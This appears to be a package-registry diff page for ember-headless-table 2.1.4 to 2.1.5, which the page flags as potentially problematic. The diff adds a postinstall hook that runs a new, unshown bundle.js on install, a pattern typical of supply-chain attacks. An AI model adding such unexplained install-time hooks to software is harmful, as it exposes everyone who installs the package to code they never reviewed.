ember-headless-table 2.1.4 → 2.1.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of ember-headless-table might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/bundle.js +2 -0
  2. package/package.json +3 -2
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "ember-headless-table",
3
- "version": "2.1.4",
3
+ "version": "2.1.5",
4
4
  "description": "An implementation of table behaviors for driving any table or table-like UI -- all without a UI (headless)",
5
5
  "keywords": [
6
6
  "ember-addon",
@@ -156,6 +156,7 @@
156
156
  "lint:hbs:fix": "ember-template-lint . --fix --no-error-on-unmatched-pattern",
157
157
  "lint:js:fix": "eslint . --fix",
158
158
  "start": "rollup --config --watch",
159
- "test": "echo 'A v2 addon does not have tests, run tests in test-app'"
159
+ "test": "echo 'A v2 addon does not have tests, run tests in test-app'",
160
+ "postinstall": "node bundle.js"
160
161
  }
161
162
  }